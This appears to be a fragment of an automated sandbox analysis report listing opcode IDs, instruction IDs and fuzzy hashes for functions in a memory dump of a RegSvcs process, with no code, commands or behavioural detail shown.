                                                                                                              • Opcode ID: 3046d95dbee8bf34ed73a1dd13128374111d165c7b37641b840b45d1ec643cf0
                                                                                                              • Instruction ID: cb2594d6a4f198d9dc9fdd0a0b7244f2f65669265c94097d6d6ab2db1df3888e
                                                                                                              • Opcode Fuzzy Hash: 3046d95dbee8bf34ed73a1dd13128374111d165c7b37641b840b45d1ec643cf0
                                                                                                              • Instruction Fuzzy Hash: A75134716083429FE754DF2AC881A6BBBE5BFC8208F444A2DF589C7350EB31D905CB96
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                              • Instruction ID: fb74f9d717c8394142bbc1ca9311fc99bc2323091e3b3ccb8c08b1765ecb87ec
                                                                                                              • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                              • Instruction Fuzzy Hash: B2517171E0021AABDF25DF98C480BEEBBB5BF49754F044069EA02AF241E774DD45CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                              • Instruction ID: 58ebc16b6ab002ce701c8a0d9c21950d2962a7b3bf60c140a1dbdea5345bbb82
                                                                                                              • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                              • Instruction Fuzzy Hash: 75519371D0020AAFEF22DB94CD84BAEBB75BF40324F194669DD1267294D772DE418BA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e759f67711c740c914d0ebf696952b1f061adc4503914da3a10f1b65131104ad
                                                                                                              • Instruction ID: 0c9ab1c7bf73f3b6f9a6581f282ec64d8745ce7d457e12db165f13e001ed30bd
                                                                                                              • Opcode Fuzzy Hash: e759f67711c740c914d0ebf696952b1f061adc4503914da3a10f1b65131104ad
                                                                                                              • Instruction Fuzzy Hash: C141D5717016129BDBA9DB2ECC94B7BBB9FEF90220F088219ED5587B81DB34D801C791
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3ae284829b2faa11f86d4b0ba7051a6807d4cdb1f0567a5adc0a6795d7ff4cf9
                                                                                                              • Instruction ID: 6e3430c2707d4903f22fdaf27f21eb8bb778ac424a4c597e65e3420fa2d82af0
                                                                                                              • Opcode Fuzzy Hash: 3ae284829b2faa11f86d4b0ba7051a6807d4cdb1f0567a5adc0a6795d7ff4cf9
                                                                                                              • Instruction Fuzzy Hash: CA51CFB2D40216EFCB20DFA9CC90AAEBBB9FF88318B594519D505A7308D770ED41CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                              • Instruction ID: 1a193c25de2dd464e426fcd7bc7ac6255325654029dbc9391d6c4f40eb88c5ca
                                                                                                              • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                              • Instruction Fuzzy Hash: 2641A2716007169FDB65CFA8CD84A6AB7A9FF84214F05862EED528B740EB30ED15C7D0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 96b598a73bc7fa7f2df1366a313893c83593d3b7e8d5e8627af78f2ee4e4b3c0
                                                                                                              • Instruction ID: 2c940082d8468f2f7b8beb955d044835a4d0be7c8e961434a925c685b587b3e8
                                                                                                              • Opcode Fuzzy Hash: 96b598a73bc7fa7f2df1366a313893c83593d3b7e8d5e8627af78f2ee4e4b3c0
                                                                                                              • Instruction Fuzzy Hash: 27418C3A90021ADFDB15DFD8C440AEEB7B5BF98A10F14815EF915EB280D7359D41CBA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7890c25bef7f5e9821932b9ef68a7ed862a86054d9a1b253aa0ff8b7b3bf5ff4
                                                                                                              • Instruction ID: 7b39367b5e23eeaf1c20faf21765a7303f2d415bab5a25f33b7493635db0ba75
                                                                                                              • Opcode Fuzzy Hash: 7890c25bef7f5e9821932b9ef68a7ed862a86054d9a1b253aa0ff8b7b3bf5ff4
                                                                                                              • Instruction Fuzzy Hash: 8541E4722043029FD721DF28C886AAFB7E5FF88214F18492EE657CB651EB70E844CB51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                              • Instruction ID: 628b60dd38f38b0b505697f629be063f1885d16f92cb390192d0d6773de0ad7d
                                                                                                              • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                              • Instruction Fuzzy Hash: 4B516C75A01215CFCB1ACF98C880AAEF7B2FF84750F1581A9D915E7391D770AE42CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 60393afba14e049b12507103a45d156843150894717b28434ec12c8c6b971a73
                                                                                                              • Instruction ID: 3a9ae2ed893acd4f48c78bffe37d2d7280fa387b190e071a274bfdf9ad7cd18a
                                                                                                              • Opcode Fuzzy Hash: 60393afba14e049b12507103a45d156843150894717b28434ec12c8c6b971a73
                                                                                                              • Instruction Fuzzy Hash: 0F51E2B09402179FDF259B28CC00BADBBB1FF51314F0482A9E529AF2C2E7349985CF41
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 065f4ea83e493cbd7a352b70e54527e42f6933eadb44f63f2935546a5d6331d8
                                                                                                              • Instruction ID: be6759b927ca8d84360199517c01d9a904e6ac02911e547b5526eb17e9e19a71
                                                                                                              • Opcode Fuzzy Hash: 065f4ea83e493cbd7a352b70e54527e42f6933eadb44f63f2935546a5d6331d8
                                                                                                              • Instruction Fuzzy Hash: F0419171E502699BCF21DF68C945BEEB7B8FF44740F4104A9E908AF281D6349E80CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                              • Instruction ID: 8305dfadeb35edb66cb17332fee82faddb3e27398b48492b07160a8488b2a2b3
                                                                                                              • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                              • Instruction Fuzzy Hash: B9419275B00216EBEB55DF9ACC84ABFBBBEAF88610F144069ED04A7741DB70DD0187A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0956f708fdaa2789859586bde1f93c02472487af20c459bea703a33a7a88d9d9
                                                                                                              • Instruction ID: c6fe07b591c91e7404d29eb6b6e8a036e7fa8e69d0edbefb1a6d6c15f9d73df5
                                                                                                              • Opcode Fuzzy Hash: 0956f708fdaa2789859586bde1f93c02472487af20c459bea703a33a7a88d9d9
                                                                                                              • Instruction Fuzzy Hash: 874193716007029FDB25CF28C480A2AB7F9FF49314B144E6DE5578FA91E730E455CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b3c60f618da854fd0a15354616aea0aca8a9f3e64ff72aaa9ef0e4676f2a2717
                                                                                                              • Instruction ID: 47ddee41c3efb3c4f97e118837b5bbf147a36cb7740a2d3b7e7e03c9c57eef7c
                                                                                                              • Opcode Fuzzy Hash: b3c60f618da854fd0a15354616aea0aca8a9f3e64ff72aaa9ef0e4676f2a2717
                                                                                                              • Instruction Fuzzy Hash: 9141A932A40206DFDF25DF6CD995BEE7BB0FB98364F040669D511AF291DB349A00CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 49850f81fc5788294eeab1c3aca20d2b8035ebc158e1ce919e0f3001c716c1a4
                                                                                                              • Instruction ID: 8ae084aeba7c75738b72042438a40856f8b7a23beaf46fef44f137a54638c6db
                                                                                                              • Opcode Fuzzy Hash: 49850f81fc5788294eeab1c3aca20d2b8035ebc158e1ce919e0f3001c716c1a4
                                                                                                              • Instruction Fuzzy Hash: 1041DC72A0020BDBDB249F5CCC80B6EBBB5FBD6604F14822ED9019F255DB75D842CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1d5384ba3a35cf239ed29770a8441ad3ae7cae8734af15c7dcbdd40d6fc77b50
                                                                                                              • Instruction ID: bf8817853371ed31a2ef738938fbaa6873e2f2b4a6a3c1e7b5c02d95cb3bfbb4
                                                                                                              • Opcode Fuzzy Hash: 1d5384ba3a35cf239ed29770a8441ad3ae7cae8734af15c7dcbdd40d6fc77b50
                                                                                                              • Instruction Fuzzy Hash: EA413F319187169ED312EF65C880A6FB6E9FF84B54F40092AF984DB150E731DE458BA3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                              • Instruction ID: 0e9c0452081a80805aa432730dab2f8c18e5c1a638061d9712a5a2516fe2aa2e
                                                                                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                              • Instruction Fuzzy Hash: 45416E31E00212DBEB15EE5884847BEB7F1FB90752F15806BEA60AF241D6329D41C791
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 416f7197c79eaf56adc66a6f13d9407264e5a000e3344d329527d1b3cf26d072
                                                                                                              • Instruction ID: 35feeee73ccf909afd49dc68d79ee9981ba9cfcf05319c6ba1b974f359495a20
                                                                                                              • Opcode Fuzzy Hash: 416f7197c79eaf56adc66a6f13d9407264e5a000e3344d329527d1b3cf26d072
                                                                                                              • Instruction Fuzzy Hash: 84416D71A40601EFDB21CF18C840B2ABBF9FF54314F648A6AE549CF291E775E941CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                              • Instruction ID: 628f4724648fa90801fed71e3e8f734c5d6c77cdb5af23388a039701c86970c6
                                                                                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                              • Instruction Fuzzy Hash: AB410B75A00605EFDB24CF98C990AAABBF4FF18B00B10496DE556DB691D330EA44CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6d5b78d441e01a2be4faf7806b293697191b80c5483547aa263c69406269a583
                                                                                                              • Instruction ID: 7eeb0d9b0821ad85880af56758298f457df61f59e0b4bb80475bb3a9dee628e0
                                                                                                              • Opcode Fuzzy Hash: 6d5b78d441e01a2be4faf7806b293697191b80c5483547aa263c69406269a583
                                                                                                              • Instruction Fuzzy Hash: 5141B3B0901701EFCB25EF28D940B6DB7F5FF85314F148699C50AAF6A1DB30A941CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6af99f67b4715387e04434fbab926f59304562c41cdc6261149bc154829c44ea
                                                                                                              • Instruction ID: daa7a6a6a2d14ca48aba102a41b65c8b95a0216df6a1d8150370eb8de28bc961
                                                                                                              • Opcode Fuzzy Hash: 6af99f67b4715387e04434fbab926f59304562c41cdc6261149bc154829c44ea
                                                                                                              • Instruction Fuzzy Hash: 623199B1A01346DFDB12CFA8C840799BBF4FB48B14F2085AED109EB291D3729902CF90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7ab1d6784a73862638d72ecb872ab0a92d31fc4012a4fd0611a2bda6c08ba438
                                                                                                              • Instruction ID: 25d5462f20f27d59547add1a54cbb5c4a6bf85a6a9d2ebf8b0366d6c9c7085b0
                                                                                                              • Opcode Fuzzy Hash: 7ab1d6784a73862638d72ecb872ab0a92d31fc4012a4fd0611a2bda6c08ba438
                                                                                                              • Instruction Fuzzy Hash: A4417C72508301AFD760DF29C845B9BBBE8FF88654F004A2EF998DB251D7709945CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 22266aa92c80adb7753dc33a2ac50e556e9dc63643c3e4ffb0ef03b57fadfcd5
                                                                                                              • Instruction ID: 110ba406b3d04999fcf548f5f96e200a3b8967ee6a731e32c3952b82c88087cd
                                                                                                              • Opcode Fuzzy Hash: 22266aa92c80adb7753dc33a2ac50e556e9dc63643c3e4ffb0ef03b57fadfcd5
                                                                                                              • Instruction Fuzzy Hash: 1341C071E05616AFDB11EF18C9806ACBBF1FB94760F948629D816BF280DB34ED418B90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c406b0e7e41d936d4778cec3c4bbc860297e966136e0cc070ea29fdfa500d700
                                                                                                              • Instruction ID: 9d60a4706705bedbc87fdded81d73ecb7450b4e36a4e6139185fb973b2b4ed8b
                                                                                                              • Opcode Fuzzy Hash: c406b0e7e41d936d4778cec3c4bbc860297e966136e0cc070ea29fdfa500d700
                                                                                                              • Instruction Fuzzy Hash: 3541CE726047529FC720DF6CDC40A6AB7E9BFC8700F184A2DF9949B694E730E944C7A6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 135a5c925493e02d2fbab9fe1deaeff5430f9ad216b24217c77fd5bd8c901c9f
                                                                                                              • Instruction ID: 9024f4cf6a57b676d749a1c4610afbb83d0e60c06d3c87aae8483372a339c8d8
                                                                                                              • Opcode Fuzzy Hash: 135a5c925493e02d2fbab9fe1deaeff5430f9ad216b24217c77fd5bd8c901c9f
                                                                                                              • Instruction Fuzzy Hash: FE41B0306003029BDB25DF28DA94B2EBBEAFF80354F14452DEA458F291DB30DC52CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4cced179e415fbf1b40ea00d61ba29d441e544e221d89508542b411f5f6ef6b8
                                                                                                              • Instruction ID: 9bfba60f2f919a68cb716c2087d62b45e0810f1cbad9f0578f1d906a30c4a2ca
                                                                                                              • Opcode Fuzzy Hash: 4cced179e415fbf1b40ea00d61ba29d441e544e221d89508542b411f5f6ef6b8
                                                                                                              • Instruction Fuzzy Hash: 63417D71E01606DFCB15EF69C98099DBBF1FF88320B54862AD466BF2A0DB34A941CB40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                              • Instruction ID: 9e6ab09bb6f76491dca945d1fc6463e241447437b338234968dd061f534165b1
                                                                                                              • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                              • Instruction Fuzzy Hash: 6B31D331A54245ABDB118B68CC40BAFBBE9BF54350F0445A6F455DF392D6749884CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7d81d7e09d687e3cb92197f7251b206378029e68a5bd6cb48a124e8c26811f31
                                                                                                              • Instruction ID: d0dbddabc90b9fb2904f58dc1ee5a41d636340923f5d1a3940fbb1ad3d68a080
                                                                                                              • Opcode Fuzzy Hash: 7d81d7e09d687e3cb92197f7251b206378029e68a5bd6cb48a124e8c26811f31
                                                                                                              • Instruction Fuzzy Hash: E7319631B51707ABD7229F658C91FAF7AA9BBD8B50F000068F600AF391DAA5DD05C7A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 12430a0306cda981050e6c9ea7b73217e448ad9f090b86053836558c2d247b35
                                                                                                              • Instruction ID: c5503bf3b3182bcc6ba0da493642dadb33a9c2356111986881e9b5e5cc108fcc
                                                                                                              • Opcode Fuzzy Hash: 12430a0306cda981050e6c9ea7b73217e448ad9f090b86053836558c2d247b35
                                                                                                              • Instruction Fuzzy Hash: 6231EF322452019FC321DF19DC81F2AB7E6FF84360F0A446EE9959B751DB30A810CB84
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 96fba42434c57b599ab243d9d9ad6b8dd9a3fc8c70aa2b50c04e7cf7c879ef64
                                                                                                              • Instruction ID: 9305338738b328e3343cea0040150bc9eb4d82f0e46e56e24a7e09d0daf9bed0
                                                                                                              • Opcode Fuzzy Hash: 96fba42434c57b599ab243d9d9ad6b8dd9a3fc8c70aa2b50c04e7cf7c879ef64
                                                                                                              • Instruction Fuzzy Hash: 2D41A275200B45DFDB22CF28C981B9A7BEABF45314F04481DE6598F291D774E841CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2324623c0886e44a3692bfe65038024eba9d9c433f47cc36534b440ee77f58ba
                                                                                                              • Instruction ID: b659ac27cc17f0b4a1772058114fa9030134a689dcc332ebd85fd27676a83a76
                                                                                                              • Opcode Fuzzy Hash: 2324623c0886e44a3692bfe65038024eba9d9c433f47cc36534b440ee77f58ba
                                                                                                              • Instruction Fuzzy Hash: 9C317A716043029FD320DF29CC82B2AB7E5FB84720F09496DE9959B791EB30E815CB95
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 36131bd5766ae502713355705deaca2375a188c7accf7f51837a9eb6605a69f1
                                                                                                              • Instruction ID: 83dcee49ed9426befb8a71999556353c514772d5ac427ea1502f7c552ab1311e
                                                                                                              • Opcode Fuzzy Hash: 36131bd5766ae502713355705deaca2375a188c7accf7f51837a9eb6605a69f1
                                                                                                              • Instruction Fuzzy Hash: 8531EA71241A92DBF32B579CCE48B16BBD8FB40784F1D08A4EB458B7D1DB69D841C270
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ccbb2650be16b56bb5b75d9e99cfb0e5c4e39943c0a6aa5b1de19c66804f9773
                                                                                                              • Instruction ID: 419bc9855d4670d45dba471bb060f7ab3f3a9a5f80f9fb7ba75986456df422fb
                                                                                                              • Opcode Fuzzy Hash: ccbb2650be16b56bb5b75d9e99cfb0e5c4e39943c0a6aa5b1de19c66804f9773
                                                                                                              • Instruction Fuzzy Hash: A531A175A0025AEBDB15DF98CC40FAEB7B5FB44B80F858169E900EB254D770ED41CBA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
